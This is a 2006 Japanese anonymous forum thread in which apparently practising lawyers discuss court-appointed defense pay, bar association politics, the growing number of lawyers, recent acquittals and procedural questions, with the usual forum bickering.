皆,マスコミや被害者の親族の言動に引っ張られすぎ。

211 :無責任な名無しさん:2006/03/18(土) 20:42:51 ID:QMPePHNU

それで洒落のつもりかねw

212 :無責任な名無しさん:2006/03/18(土) 21:37:24 ID:Ash+JRFJ
田舎なので遅くてすまないが,自由と正義を見ていたら,25000番くらいの若い人が割と複数登録を下げていたのが気になった。

213 :無責任な名無しさん:2006/03/18(土) 22:07:06 ID:bwDugjEm
>>199
ちょっと井上薫風な判決を最近見た。

214 :無責任な名無しさん:2006/03/18(土) 22:09:53 ID:bwDugjEm
執行猶予期間満了まであと2か月ってところで,弁護人の期日を遅らせて時間切れを狙うようなもんだな。
被告人が時間切れを望むなら,可能な範囲で協力するのが普通だろう。

215 :無責任な名無しさん:2006/03/18(土) 22:48:57 ID:Vuk7YSyu
過去には麻原裁判
今はカレー事件、ヒューザーの社長、この事件

こんなやっかいな事件の弁護人を引き受けるのは真似出来ないことだから
単純に感服してしまう。

216 :無責任な名無しさん:2006/03/19(日) 01:27:15 ID:vUP73Uaz
>>192
> 強制加入廃止ってことは、法務省の監督に服するってことだ

別に、法務省の監督に服してもいいよ。監督に服して困ることやってないし。
そんなことより、漏れの納めたバカ高い会費使って、
漏れの信条に反する政治的アピールをするのをやめてくれ。

217 :無責任な名無しさん:2006/03/19(日) 08:17:27 ID:bCnBteCK
被害者にいちいち懲戒請求されたら,たまらんな。
ますます刑事やる気が失せてきたな。

218 :無責任な名無しさん:2006/03/19(日) 08:25:29 ID:QXtTHxO7
>>202
非弁乙

219 :無責任な名無しさん:2006/03/19(日) 10:48:41 ID:LpRr075R
おいらが修習生のとき,
新しく来た高裁長官がお見えになるので
地裁の期日を変更したということがありました。
当事者には本当の理由を伝えてないんでしょうが。
やっぱり裁判所様は偉いのですね。

220 :無責任な名無しさん:2006/03/19(日) 11:23:17 ID:3FKHn4p7
>>217
弁護活動として問題なければ懲戒請求されても困らないだろ。


221 :無責任な名無しさん:2006/03/19(日) 11:23:19 ID:yamo+Zk1
↑ 法廷を一旦休憩にして、巡視の所長にあいさつに行った裁判長が居たが、
さすがに、陪席の目を気にしていたよう。

弁護人にはなんのあいさつもなかったが。


222 :無責任な名無しさん:2006/03/19(日) 11:30:28 ID:M6uAtyWK
>>216
君が監督に服して困ることやってなくても法務省の傘下に入ることは問題。
でも、強制加入なのに信条に反するアピールをされることも問題。


223 :無責任な名無しさん:2006/03/19(日) 11:46:28 ID:yamo+Zk1
>>220 一度DQNから懲戒請求をされるか、された知人弁護士からの話を聞いてごらん。

弁明書書いたり、何回も、綱紀委員会などに出向くんだよ。
アンタは、合格間違いないと思う試験でも、発表までは気になるという経験がないんだろね。
ましてや、弁護士会の派閥推薦で出てくる綱紀委員や懲戒委員なんて連中が出す結論を、はなから疑問を持たないんかね。

224 :TN:2006/03/19(日) 12:29:40 ID:Ztr8BuJW
弁護士法の懲戒規定を一度読んでごらん
とんでもない規定だよ
これをおかしいと思わないような団体の出す結論なんて全く信じられない


225 :無責任な名無しさん:2006/03/19(日) 12:35:06 ID:mWR978/6
 でも、恋愛は男の人にリードされたい派だ。

「九州女って外見は強そうに見えても内面はとても甘えん坊なんですよ。だから恋愛では私をグイグイ引っ張っていってくれる人でなきゃダメですね。あと、その場の空気が読める人。それと、やさしくて面白くて話題の豊富な人。欲張りですよね(笑い)」



226 :無責任な名無しさん:2006/03/19(日) 12:40:14 ID:3FKHn4p7
会長声明無効確認訴訟をしてみようという気概のある奴はおらんのか。

>>223
>合格間違いないと思う試験でも、発表までは気になるという経験
をしていない弁護士はいないと思う(法5条の人以外)。

227 :無責任な名無しさん:2006/03/19(日) 13:34:12 ID:Lg/wnuBs
司法書士の実体は以下の通り。
みすてないで
http://www.zssk.org/archives/touhaigo/index.html
大阪司法書士会臨時総会訴訟について
http://www.aoitakigawa.com/osakasihoushosi.html

228 :無責任な名無しさん:2006/03/19(日) 15:14:03 ID:9Z/uT4Up
>>209
非弁乙。

229 :無責任な名無しさん:2006/03/19(日) 17:00:01 ID:sQ1vPnA3
出席すれば、結審して5月頃に死刑判決。
欠席して、期日を引き延ばし、裁判長退官で無期懲役維持の可能性あり。

弁護人なら後者を選ぶのは当然なんじゃないか?
選ばない方が弁護過誤のような気がする。

230 :無責任な名無しさん:2006/03/19(日) 18:26:02 ID:rUEyGSuI
>>229
裁判官の交代で判決内容が変われば苦労しない
労働事件じゃないんだから

231 :無責任な名無しさん:2006/03/19(日) 20:38:26 ID:sQ1vPnA3
>>229
しかし今回の件に限ると量刑相場から考えて死刑ってのは無理なんじゃないか?
そりゃ、被告人の態度には頭にくるが、裁判所がマスコミ・被害者に裁判所が
引っ張られるようじゃ裁判員制度になったらどうなることやら。

232 :無責任な名無しさん:2006/03/19(日) 22:05:51 ID:U9gYGiHF
今回の件は量刑相場から「死刑が無理」とは言えないだろう。
死刑間違いなしとは言わないが、無期か死刑か結構微妙なところでは。
ここで裁判所の心証を害する方が危ないような気がするが……。

裁判員制度は、そもそも世間の意見に従わない裁判所を動かすためのもので、
弁護士会が考えるような「冤罪からの救済」には全く役立たないと思うが……。

233 :無責任な名無しさん:2006/03/19(日) 22:26:52 ID:ZryMBWCb
冤罪からの救済なんて言ってたっけ。

まあ無罪率は上がるんじゃないかとは思うけどね。
有罪になるべき事件の無罪率が上がって、有罪事件の量刑は重くなりそうな気がする。

234 :無責任な名無しさん:2006/03/19(日) 23:03:16 ID:sQ1vPnA3
>>232
18才30日だと無理だと思うが・・・
婦女暴行も死後という認定になってるし

235 :無責任な名無しさん:2006/03/19(日) 23:16:33 ID:qwz3fKuJ
個人的には欠席やむなしだと思う。
欠席理由はあれだが。マスコミ誘導の怖さだね。

236 :無責任な名無しさん:2006/03/20(月) 00:30:22 ID:OZvFVWOA
>>234
最近は裁判所の量刑自体上がっている。
10年前なら無期懲役でも、今なら死刑もあり得ると思われ。

ところで、安田弁護士が期日直前に受任したのは何故?

237 :無責任な名無しさん:2006/03/20(月) 12:19:00 ID:NkjWTEz2
>>236
前任の弁護人が降りたから、だけじゃないの?
引き受け手がいなかったから受けたとか。

238 :無責任な名無しさん:2006/03/20(月) 13:57:59 ID:IsxFdVKH
期日までに受任する弁護士がいなかったらどうしたんだろうか?

239 :TN:2006/03/20(月) 14:09:11 ID:xyDsQkv5
刑事事件を殆どやらない弁護士の推測

誰も弁護士がいない
   ↓
最高裁はこれ幸いと国選に回す
   ↓
そういう事態を避けようとした安田弁護士があえて火中の栗を拾った

法テラスができたら都合のいい弁護士ばかり国選に付されるんだろうね
ホント日弁の執行部は頭のいい連中だよ

今日は事務所のネットワークがおかしくなって仕事にならない
パソコンで苦労するのも久しぶりだ



240 :無責任な名無しさん:2006/03/20(月) 16:20:08 ID:o1uKdlVx
田舎では,法テラスになっても状況は変わらないと思われるが。

「都合のいい弁護士ばかり国選に付される」とは,
ずいぶんと馬鹿にした発言だな。

241 :無責任な名無しさん:2006/03/20(月) 16:32:42 ID:IOkP5GmT
大阪地裁所長への強盗致傷,被告人2名に無罪。
日航機ニアミス,管制官2名に無罪。

無罪判決のニュースを一日に二つも聞くなんて,珍しいこともあるもんだ。

242 :無責任な名無しさん:2006/03/20(月) 17:09:47 ID:4qzB0A3x
>240
 田舎弁護士は、被疑者公選の負担に耐え切れず、受任拒否ないし受任数制限。
     ↓
 弁護人不足が深刻化。
     ↓
 副検事に弁護人資格付与という流れではなかろうか。
 漏れは支部弁護士だが、弁護士会の主義主張のために、無理して国選弁護人をやろうとは思わない。
嫌なら弁護士会で手当てすればって思っている。

243 :無責任な名無しさん:2006/03/20(月) 17:20:43 ID:xVDlFVyr
そうだな、副検事は年金がしこたま入るから、暇にまかせて小遣い銭稼ぎに
国選を幾らでもやるだろうな。

244 :無責任な名無しさん:2006/03/20(月) 17:22:35 ID:WsP0rWO3
誤解を招く通達を出し、司法書士の定款作成を新会社法施行までに間に合わせたかった法務省。1月18日の照会からたった2日で回答。しかも、司法法制部とも協議済みとのおまけつき。
通達を出した当日に司法書士会と公証人会に手際よく通知。 しかし、MLに匿名で流された情報で知った行政書士個人からの照会には協議をするといって時間稼ぎ。
司法書士は喜び勇んで各地域の司法書士会に通知。京都会の幹部や東京司法書士政治連盟などは、よろこびをホームページで表明した。
ところが、、。悪夢はここからである。
公証人役場からこの情報を聞きつけた行政書士会は、早速法務省に照会。
しぶしぶ、司法書士の定款作成は違法であるが、定款そのものが無効というわけではないので受け付けるという意味であると明かす。
公証人会からも疑問の声があり、法務省は登記研究2月号に、司法書士が定款作成することは違法であると明記すると釈明。
民事局第二課を通じて司法書士会連合会にも、定款作成は違法であると厳重指導を約束。
全国の公証人役場にも、この旨が通知され、いままで通り司法書士の作成した定款は認証しないように要請した。
商業登記の開放が現実的になったため、法務省管轄の司法書士資格の権益確保に奔走し、勇み足をしてしまった格好だ。かくして、司法書士の定款作成は違法であると再確認された。

245 :TN:2006/03/20(月) 17:26:48 ID:xyDsQkv5
中坊氏は被疑者国選に人員が必要だといって三千人増員のゴーサインを出したわけ
でもその連中がやるかどうかわかんないけどね

246 :無責任な名無しさん:2006/03/20(月) 19:02:09 ID:4qzB0A3x
 地方支部だと、今後増大する刑事事件のプロボノ活動を支えるだけの民事事件がないので、
弁護士を増やしても無意味なんですけどね。
 次期日弁連会長さんは、選挙中は国選弁護報酬の増額云々も言っていたようですが、当選し
た後はどうなのでしょうかね。

247 :TN:2006/03/20(月) 19:21:43 ID:XPr5Wqa6
>>246
あなたと同じことを私も考えているわけで
でもそれを中坊氏やその取り巻き達は分かってなかったようですね
出世欲の強い方々はホントに優秀な方ばかりのようでうsね

248 :無責任な名無しさん:2006/03/20(月) 20:20:44 ID:1fpMAGKr
ま,将来性のない職業ですな。

249 :外坊:2006/03/20(月) 20:31:33 ID:kj4IQXuO
心配しなくとも、3000人になれば食い詰めた奴が幾ら低額でも国選をやるって


250 :無責任な名無しさん:2006/03/20(月) 20:41:13 ID:l8OLDQst
TNって頭悪いな。

251 :無責任な名無しさん:2006/03/20(月) 20:43:38 ID:bbqGA77I
>>249
迅速に処理してくれて,裁判所は喜びそう。


252 :外坊:2006/03/20(月) 21:00:48 ID:kj4IQXuO
外に仕事がわけだから、できるだけ時間をかけて少しでもお金をたくさんもらおうとするから
迅速ではないよ。

253 :無責任な名無しさん:2006/03/20(月) 22:13:00 ID:DVpdXQh4
>>252
国選の報酬算定方式って法テラスになったら変わるの?

254 :無責任な名無しさん:2006/03/20(月) 22:15:06 ID:1fpMAGKr
一回結審の奴なんかは4,5万になるなんて言われてるね

255 :無責任な名無しさん:2006/03/20(月) 23:05:40 ID:IOkP5GmT
4〜5万だなんて・・・今でさえ真面目にやればやるほど赤字なのに。
大規模会でときどき問題になる高齢弁護士のような弁護活動がスタンダードになってもいいということなのかな?

256 :無責任な名無しさん:2006/03/20(月) 23:17:33 ID:+5PaEpmC
>>254
>>255
ようするに、今の1回結審の事件なんか4〜5万円程度の
価値しかないと思われてるってことだね。

257 :無責任な名無しさん:2006/03/20(月) 23:45:06 ID:OZvFVWOA
覚醒剤自己使用の初犯ならそれでも仕方ないと思うけど、
被害者複数で示談取り付けても同じというのは納得できない。
裁判所にはそのあたりの努力もきちんと評価して欲しい。

258 :無責任な名無しさん:2006/03/21(火) 01:26:37 ID:kslqyr/K
国選もタイムチャージにしてくれればいいのにね。
ただ、そうすると無駄に時間を稼ぐ弁護士が増えそうだけど。

259 :無責任な名無しさん:2006/03/21(火) 02:27:10 ID:2FynxO5s
ところで、大阪地裁所長(当時)に対する強盗事件の無罪判決って、
けっこうすごいよね。
所長の目撃調書とか、不同意にしたんだろうか。
そしたら、所長の尋問なんかやったんだろうか。
で、所長の証言は信用できないとか判決で書いたりするのかな。
こんな事件に当たってしまった裁判官って、内心ドキドキなんだろうか。
しょぼい国選しかやったことがない田舎弁護士の漏れには想像できない。

260 :無責任な名無しさん:2006/03/21(火) 07:47:27 ID:48EDnhDn
1回結審国選4〜5万になったら、もう国選受けるのは止めよう。
それがベースなら、5回やったって7〜8万がいいとこじゃないか?
今だって法廷の回数が増えても数千円ずつしか上がらないもんね。
やる人は必ず現れるだろうし、もういいよ。
真面目にやろうとすればするほど、バカをみる。
今まで地方で年間30〜40件くらいやらされてきたけど、退官後の人が
入会したらその人がガンガン国選やってる。国選ばっかりやっている。
結構手を抜いてやっている。
裁判所は、そういう人だけにやってもらえば十分と思っているんだろうな。
ダンピングしたってやる人がいる限り、報酬は下がり続けるだろうね。

261 :無責任な名無しさん:2006/03/21(火) 09:03:51 ID:Lr/dzAJ7
敵は裁判所でなくて財務省だということを分かってない奴が多すぎw

262 :無責任な名無しさん:2006/03/21(火) 09:19:40 ID:Vd+Bq6OD
>>259
所長の証人尋問をやったよ。
所長は加害者を見ていないと証言したハズ。

263 :無責任な名無しさん:2006/03/21(火) 09:21:30 ID:Vd+Bq6OD
ちょっと検索したら、記事があったわ。すまんす。
ttp://www.ytv.co.jp/ns/special/bn/2004/12/041206.html

264 :TN:2006/03/21(火) 09:25:58 ID:Nu1VO8tF
ホント将来性のない業界だと思うよ
オレがリタイアするまでは何とかなるだろうけど若い人は大変だな
唯一の望みは来年大量に職にあぶれて三千人案の見直しをする事

265 :無責任な名無しさん:2006/03/21(火) 10:59:09 ID:g3mQl+YL
>>257
法テラスが「示談は別途本人・家族から報酬をもらってよい(もらっても刑事弁護報酬に当たらない別事件の報酬)」というお墨付きをくれたようなもの。

266 :無責任な名無しさん:2006/03/21(火) 11:04:02 ID:g3mQl+YL
>>264
新1期は採用するべきでないという共通認識を早く広めないといけないな。
まあ59期でも就職が苦しい様子だし,来年の採用はあぶれまくりになるだろう。

267 :無責任な名無しさん:2006/03/21(火) 13:15:09 ID:HhwhNFDI
所長事件
証人尋問では、被告人が犯人ではないような証言をされてました。
大阪高裁の地獄部に配点させれば、自白は信用できる、防犯ビデオは矛盾するとまで
はいえない、・・・・っで逆転有罪になりうる。
検察が高裁の配点を操作できるのだろうか??


268 :無責任な名無しさん:2006/03/21(火) 13:19:23 ID:qx3xTQNr
いくら大阪高裁地獄部でも、さすがに元・地裁所長の証言を蹴飛ばして有罪は書けないでしょう。
それとも、待ってましたとばかり、元・地裁所長の知覚能力・認識能力・記憶能力をケチョンケチョンにけなして有罪にもっていくかな?

269 :無責任な名無しさん:2006/03/21(火) 13:46:36 ID:5ovGMqQO
>>261
敵は強いて言えば国民じゃないの。クズの犯罪者を裁くのに税金から金を出すと言うこと自体、国民的理解は得られにくい。

>>265
もらっちゃ駄目だろ。

>>264
俺は今30代半ばですが、65歳まであと30年。
65歳で満足に年金がもらえるとも思ってはいないが、それでもわずかでもなにがしかの収入があるとして、
で、今後年を取って衰えていき、新しい法知識の補充も遅れ遅れになっていき、当然客も来なくなり、
4,5万の国選を必死に取り合いしていくしか生きる道がなくって、プロボノ活動はやる側じゃなくってやってもらう側になりながら、
嫁や子の面倒を見ていく自信は全くない。
ボス弁のようなおいしい人生はない。

なもんで、今の私の最大のテーマは、独立するか、弁護士を廃業するかです。
贅沢できないのはいいとしても、生活できない職業になるおそれがあるというのを、
さんざんえらそうにしてきて世の中に嫌われてきた(司法改革の遠因の一つだと思う)、贅沢三昧の馬鹿年寄りはわかっていない。

>>266
そうだね。
将来の競争相手のために、身銭切って入り口を整備する義務はないだろうね。自由競争ですよ。
オリックスあたりが大量採用するかもね。

>>267
とはいえ、通常ならあまり熱心に捜査しない事件であるのに、裁判所の所長だからと言うことで熱心に捜査したところ、当の裁判所が「無罪!」っていうのも、
警察、検察の気持ちを思うと若干かわいそうではある。



270 :無責任な名無しさん:2006/03/21(火) 13:55:46 ID:NHC1Z7xU
田舎弁の俺は今のうちにクレサラで稼げるだけ稼いでおくしかないかな・・・

271 :無責任な名無しさん:2006/03/21(火) 13:59:12 ID:qHXvo8r4
みんな事務所持ってるん?

272 :TN:2006/03/21(火) 14:43:00 ID:Nu1VO8tF
>>269
>さんざんえらそうにしてきて世の中に嫌われてきた(司法改革の遠因の一つだと思う)、贅沢三昧の馬鹿年寄り

   ↑

いいこというねえあんた
まさにその通りだと思うよ

273 :無責任な名無しさん:2006/03/21(火) 14:53:32 ID:wWGjM0U2
とはいえ
「クライアントの皆様方に的確なリーガルサービスを」
うんぬん挨拶状に書く輩もどうかと思う


274 :無責任な名無しさん:2006/03/21(火) 16:47:26 ID:ukfiMZ4d
弁護士の世界ってやっぱり学歴差別が強いんですか?

275 :無責任な名無しさん:2006/03/21(火) 16:56:44 ID:3XRo6Ai7
基本的に、弁護士は、個人事業主と個人事業主に雇われているの二種類なので、
学歴はそんなに関係がない。
任官して出世しようと思うのであれば、学歴が関係してくるだろうけど。

で、そう言う話題は板違いなので、司法試験板あたりへ行きなさい。

276 :無責任な名無しさん:2006/03/21(火) 17:18:57 ID:oF7p5qJ7
>>274
マジレスしよう。
今までは,どこの大学を出ていようとも,難関の司法試験を通ってきた,という共通点があったから,一種の連帯感みたいなものがあって,学歴なんて誰も気にしなかった。
しかしロースクールになってからの新司法試験は今までの司法試験とは似ても似つかぬ超簡単ザル試験だから,「同じ試験を通った」ということは何ら連帯感を生じさせないだろう。
おそらく今後は,「低学歴ロースクール」差別が出てくるのではないかと思う。


277 :無責任な名無しさん:2006/03/21(火) 18:03:59 ID:5p/j1vxd
東大法学部生ですけど、やっぱり司法試験受けるのやめます

278 :無責任な名無しさん:2006/03/21(火) 18:14:43 ID:rUps1yXW
>>269

示談交渉は民事事件であって国選刑事事件の範囲外であるという説は結構有力ですよ。


279 :無責任な名無しさん:2006/03/21(火) 18:16:06 ID:rUps1yXW
>>277

正解!

280 :無責任な名無しさん:2006/03/21(火) 18:16:34 ID:48EDnhDn
>278
少なくとも国選事件が終わってないうちに、示談分として報酬を受け取ったら、
懲戒になるんじゃないの?
ちょっと前に、2万円位もらって懲戒になってた人もいたじゃないか。

281 :無責任な名無しさん:2006/03/21(火) 19:44:29 ID:pOTjE5cg
今の自分の状況をわかっていたら、
絶対に司法試験は受けなかっただろうな・・・。

県庁にでも入ったほうが間違いなく幸せだった。

282 :無責任な名無しさん:2006/03/21(火) 20:27:47 ID:m3qCY2r6
今、遺産分割調停の申立書を作ってます。
父親が死んだ後、すぐ母親が死んで、父親、母親名義の
財産がいくつかあるんですけど、その場合、被相続人は二人として
申し立てることはできるんですかね?


283 :無責任な名無しさん:2006/03/21(火) 21:33:32 ID:Kx/b+u9L
素人っぽい質問だな。

284 :無責任な名無しさん:2006/03/21(火) 21:36:35 ID:VL8GqldN
>>282
アンタはアホか?

285 :無責任な名無しさん:2006/03/21(火) 21:37:27 ID:kslqyr/K
>>278
まじですか?
次回から止めちゃおうなあ示談交渉


286 :無責任な名無しさん:2006/03/21(火) 21:48:10 ID:n9C1YSKt
若手が不満を持ってなさそうなのが不思議だ。
これから3000人時代になっていってしまうというのに,
そういうふうにした日弁連や,「若手が過疎地へ行け」
みたいなことをにおわせた某会長なんかのために,国選とか
委員会活動とか,ボランティア的なことをよく不平も言わずに
頑張ってやってるなあ。なんか不憫だ。
漏れも若手で,一応そういうのを頑張ってるつもりだけど,
それは,税金で修習させてもらったから,ある程度は恩返し
しないと,という思いから。
でも,今後出てくる人達は一体どうなるんだろう。

287 :無責任な名無しさん:2006/03/21(火) 23:20:21 ID:Lr/dzAJ7
修習の給費制が廃止になったら、地方では国選が崩壊するだろうな。
競争の激しい大都市では、食えない弁護士の生活保護代わりになるだろうけど。


288 :無責任な名無しさん:2006/03/22(水) 00:43:32 ID:WDJuaiJO
>>286
会務に熱心な若手なんてほとんどいないんじゃないか?
委員会だってほとんど決まったt顔ぶれだし

289 :無責任な名無しさん:2006/03/22(水) 01:45:01 ID:v/7GzxtR
法学教室の4月号見た?

290 :外坊:2006/03/22(水) 13:01:11 ID:a8WzdoI6
何で法学教室なんて読むの?

291 :ヤン坊:2006/03/22(水) 13:11:30 ID:vKsMFwwX
>>290
記事でも書いたんじゃないの?

292 :無責任な名無しさん:2006/03/22(水) 13:40:52 ID:otMsAGxM
とっとと日弁連なんかなくせばいいんだよ。
金ぼったくってるだけ。

293 :無責任な名無しさん:2006/03/22(水) 13:52:04 ID:m6E/Th2/
筑紫23の偏向報道に対しスポンサー不買運動始まる★5
http://live22x.2ch.net/test/read.cgi/news/1143001227/

294 :無責任な名無しさん:2006/03/22(水) 14:24:04 ID:IemNJm3l
弁護士さん、教えてください。
着手金というのはわかりますが、成功報酬というのはどの時点で「成功」なんでしょうか?
裁判で勝っても払ってくれない人もいますよね?その場合、裁判で勝った時点で成功なのでしょうか?それとも現実的に取り返しても貰った金額について成功なのでしょうか?
宜しくお願いします。

295 :無責任な名無しさん:2006/03/22(水) 14:58:15 ID:MPUY41mS
>>294
どちらの意味で契約するかによる。
一般的には、勝訴すれば、相手に金がなくて回収できなくても成功報酬は発生する。

今後は↓で聞いてくれ。二度とこのスレに書き込まないでほしい。
http://school5.2ch.net/test/read.cgi/shikaku/1112776465/

296 :294:2006/03/22(水) 17:14:26 ID:IemNJm3l
>>295
ありがとうございました。
そして、失礼致しました。

297 :無責任な名無しさん:2006/03/22(水) 19:05:51 ID:lf0vn9l4
【裁判】 「残虐だが、反省している」 逃げ道ふさいで彼女を焼き殺した男に、懲役15年判決
http://news19.2ch.net/test/read.cgi/newsplus/1142999552/l50

三好幹夫元教官

298 :無責任な名無しさん:2006/03/23(木) 00:15:30 ID:hEJgqZmD
なんかこれから弁護士が増えるらしいですがマジですか

299 :無責任な名無しさん:2006/03/23(木) 00:43:12 ID:q0hzjcwO
筋弛緩剤事件は、どうなってるんでしょうね。
高裁は強引な訴訟進行してたみたいですが。田中亮一裁判長は、
地裁時代にお世話になったことがあるのですが、人のようそうな人だったんだが・・・


300 :無責任な名無しさん:2006/03/23(木) 00:56:26 ID:kDe+rC9a
>>299
あれは弁護人の態度に問題があるだろ。
DQNには強権発動するしかない、という裁判所の意志の表明だよ。

301 :無責任な名無しさん:2006/03/23(木) 01:56:22 ID:z2L0G2ck
>>300
禿同
被告人と弁護人の地裁段階から各種請求書・申立書・意見書見れば,たいてい(ry。
いまどき,無断退廷戦術やったら,最後は,わめいて退廷命令くらうのは常識でしょう。

302 :無責任な名無しさん:2006/03/23(木) 08:17:13 ID:XR9qfXfG
弁護士の独善はよくないが,今後,裁判所が強硬な訴訟指揮を押しつけてくる
きっかけとなるのなら困るな。

303 :無責任な名無しさん:2006/03/23(木) 12:19:11 ID:cBHhsVLE
弁護士増えたらそうなるだろう

304 :無責任な名無しさん:2006/03/23(木) 12:33:57 ID:ahU8/o1z
今、イソ弁雇おうとすると、相場ってどのくらい?
5,6年前までは月50万円というのが相場だったんだけど。

305 :無責任な名無しさん:2006/03/23(木) 13:23:23 ID:3E4UQFg5
今なら年300で来るんじゃね

306 :無責任な名無しさん:2006/03/23(木) 15:47:17 ID:ABZrjKjc
ところで、いまさらなんだが、>>282って、先に死んだ父親に
連れ子がいて、母親とその連れ子は養子縁組をしてない場合は
どうなるんだっけ?
アフォな質問ですまん。

307 :無責任な名無しさん:2006/03/23(木) 16:19:14 ID:cPYfj+OR
>>306
ホンマもんの馬鹿か?
馬鹿を通り越して基地外のレベルだな。

308 :無責任な名無しさん:2006/03/23(木) 17:26:12 ID:iEiL9XJ9
同僚は調べれば分かることを何でも人に聞いてくる。
人に聞いた割には仕事も進んでない。
調べないから確信が持てなくて滞留させてるらしい。
何で調べないんだろう。

ということを282とか306を読んで思い出した。

309 :無責任な名無しさん:2006/03/23(木) 18:26:33 ID:tPEKnyUR
最高裁HPがリニューアルage

310 :無責任な名無しさん:2006/03/23(木) 18:54:37 ID:EvUmw9+9
これからはもっとバカな奴一杯出てくるぜ


311 :306:2006/03/23(木) 20:11:12 ID:ABZrjKjc
ttp://www.courts.go.jp/search/jhsp0030?action_id=dspDetail&hanreiSrchKbn=01&hanreiNo=25001&hanreiKbn=01
の判例を見て、理論的にもすっきり分かりました。
これまで再転相続の事案はやったことがなかったので、ちょっと
疑問がわいて書き込んでしまいました。
しかし、そこまで馬鹿にされるような質問だったんでしょうか。
最高裁の判例としても比較的最近のもののようですし。
まあ、2ちゃんねるでこんな質問すること自体が馬鹿といわれれば
それまでなんですが。
スレ汚しで申し訳ない。

312 :無責任な名無しさん:2006/03/23(木) 20:48:21 ID:mcCwJges
>>311
この設例、ホンマに判例とかを見ないと分からん問題なの?
学部教科書レベルと思っていたオレが、ぼけてきたのかな、誰か教えてください。

313 :無責任な名無しさん:2006/03/23(木) 21:07:58 ID:mcCwJges
>>311
この設例、ホンマに判例とかを見ないと分からん問題なの?
学部教科書レベルと思っていたオレが、ぼけてきたのかな、誰か教えてください。

314 :282:2006/03/23(木) 21:08:50 ID:QwAfVyFq
いやね、306の人にも迷惑かけちゃったけど、実体法上の話は分かるんだけど、
手続的に、1本の申立の中で処理できないかなと思ったんですよ。
結局2本申立をして、それを併合申請するしかないんですかね。
学部教科書レベルでそんなこと書いてないし、そういうケースの申立方法について
説明した書物も見当たらなかったので、ついここで聞いてしまったのです。

315 :無責任な名無しさん:2006/03/23(木) 21:31:16 ID:4XQIp8Y5
>>314

ネタかと思っていたが、ホンマもんやな。

316 :無責任な名無しさん:2006/03/23(木) 21:46:00 ID:BGfEJIJ/
>>315
学生さんは、さっさと寝てください。

317 :無責任な名無しさん:2006/03/23(木) 21:56:34 ID:mcCwJges
>>314
イヤー、ゴメン、ゴメン、えらそーな物の言い方をしちゃって。
実体法ではなく、手続きの方式の問題なのね。しかも、書物にも書いていないって。

そういう問題なら、特に家裁レベルでは、私なら、1本で出して「出来ないというなら、その根拠を示してくれ」って押し通すか、
先に電話して、「あー、ダメなの、じあー2本立てで出します」ってやるか、どちらかです。
どーせ、余分にワープロを何枚か書き足すかどうかだけの問題です。

印紙代など、かさんで手間、ヒマ、費用が見過ごせないときや、ましてや、結論に影響するときは、徹底的に調べて準備するけどね。
裁判官だって、事前に聞くと、併合請求できる事件でも、訴状2本でやってくださいって言うよ。件数が稼げるからね。
これが、実務の世界でのいろんなやりかたの一つだと思ってます。


318 :無責任な名無しさん:2006/03/24(金) 00:19:57 ID:rkNtVFhT
今日刑事の初公判だったんだが、開廷前、書記官(中年女)が検事に
「否認するらしいですよ〜」ニヤニヤ
検事(比較的若い男)「えっ!そうなんですか!」(参ったな〜と苦笑)
書記官、鼻で笑いながら検事と顔見合わせて、2人でニヤニヤ

不快だ。何が悪いという訳ではないが、弁護人の目の前で
平気でこんなことしたら、馴れ合ってると見られてもやむを得ない。
何様じゃお前ら。期日前に電話してくるときもこの書記官感じ悪かったな〜
認めるのか争うのか早く教えろとしつこく聞いてくるし。
認否が微妙な事件だってあるだろうが。

抗議できなかった自分に一番腹が立つけどね。
今度こういうふざけたことやったら退廷覚悟で猛抗議してやる。

319 :無責任な名無しさん:2006/03/24(金) 00:50:23 ID:+nV8fq13
>>318
アノネ・・・(ノ゚ー゚(; ̄□ ̄)ナヌッ?
(・∀・)ニヤニヤ(・∀・)ニヤニヤ

(#゚Д゚) ゴルァ!!
まあこんな感じか。
書記官なんて1〜2年すれば異動するから我慢我慢。




320 :無責任な名無しさん:2006/03/24(金) 00:55:55 ID:G3S2GGIZ
同期のPもうるさ型の書記官ヨイショで苦労しているみたい。
公判部だと1日置きに顔を合わせる場合も多いらしく、腹の虫を抑えて、オバンやオジン書記官に相手しているみたい。

321 :無責任な名無しさん:2006/03/24(金) 01:07:52 ID:pryupqqw
>>318
あらあら、ここは馴れ合い法廷なんですねぇえ
って、軽くあしらうのがよろしい。

322 :無責任な名無しさん:2006/03/24(金) 01:15:06 ID:G3S2GGIZ
問題書記官抗議作戦は,正義感をまだお持ちの検事にやらせるといいみたい。
かなり昔にA庁検事が刑訴法違反たてに問題オバン書記官に抗議し,書記官が転出になったことがあった。
後日談は,なんと同僚書記官からその検事が感謝されたという珍しい例。
そのA庁検事も,今は歳をとって某高検だけど(遠い目。

323 :無責任な名無しさん:2006/03/24(金) 01:48:28 ID:nSrGxdeo
ちょっと調べものをしていて気付いたんだが、真田弁護士のインサイダー事件て、
ユニマットの代理人していたときのものなんだな。
レイクとGEの営業譲渡の際、長島大野(当時)が契約書作ったのは知ってたが
(訴訟で契約書が出てきたので)。

やっぱり大きな事務所になると、クライアントの質なんかに構ってられないのかな。

324 :無責任な名無しさん:2006/03/24(金) 08:34:23 ID:HFiuA2Be
>>318
なぜその場で検事が驚くんだろうか。
書証の認否を事前に伝えないの?

325 :無責任な名無しさん:2006/03/24(金) 09:01:11 ID:yLfFbg5+
田舎の支部管内だと、弁護士も混じって三者で和気藹々してるところがないとは言えんなあ……。
なにせ、狭い社会なんで、三者の仲が悪すぎると、色々と困るんだよねえ……。


326 :無責任な名無しさん:2006/03/24(金) 09:03:40 ID:LN0LkuD/
そうですな。そこで浮いてしまうと「栄転決議」の対象にされかねない・・・

327 :無責任な名無しさん:2006/03/24(金) 19:50:32 ID:0xIUOo7B
最近のバカ弁は、いろんなところにいるわ。

破産管財人してる弁のことなんだけど、
財団所属不動産について別除権者から
任意売買の話を管財人にしたら、オーバーローンだから、
放棄したと言うんだね。

そしたら、個人なら当の本人と、会社なら清算人を選任してもらって
その清算人と、売買契約をすることになるけど、
その管財人曰く、「売買の際にはんこ代もらいます」だと。

お前何を考えてんだ?はんこ代くれというなら、放棄なんかするな。


328 :無責任な名無しさん:2006/03/24(金) 22:51:13 ID:xWCkdKYx
>>327
ま、とりあえず言うだけ言ってみて、もらったら得だとでも思ったのかなw
しかしそいつはハンコ代もらったとして、どんな報告書を書くつもりでしょう。

329 :無責任な名無しさん:2006/03/24(金) 22:51:56 ID:xWCkdKYx
まだ放棄の予定ってだけで、放棄してないのかもしれないな。

330 :無責任な名無しさん:2006/03/25(土) 14:46:33 ID:kJ/RZOjf
あ〜あ、すっかり春めいてきた、こんなに天気のいい日も仕事とは・・・orz

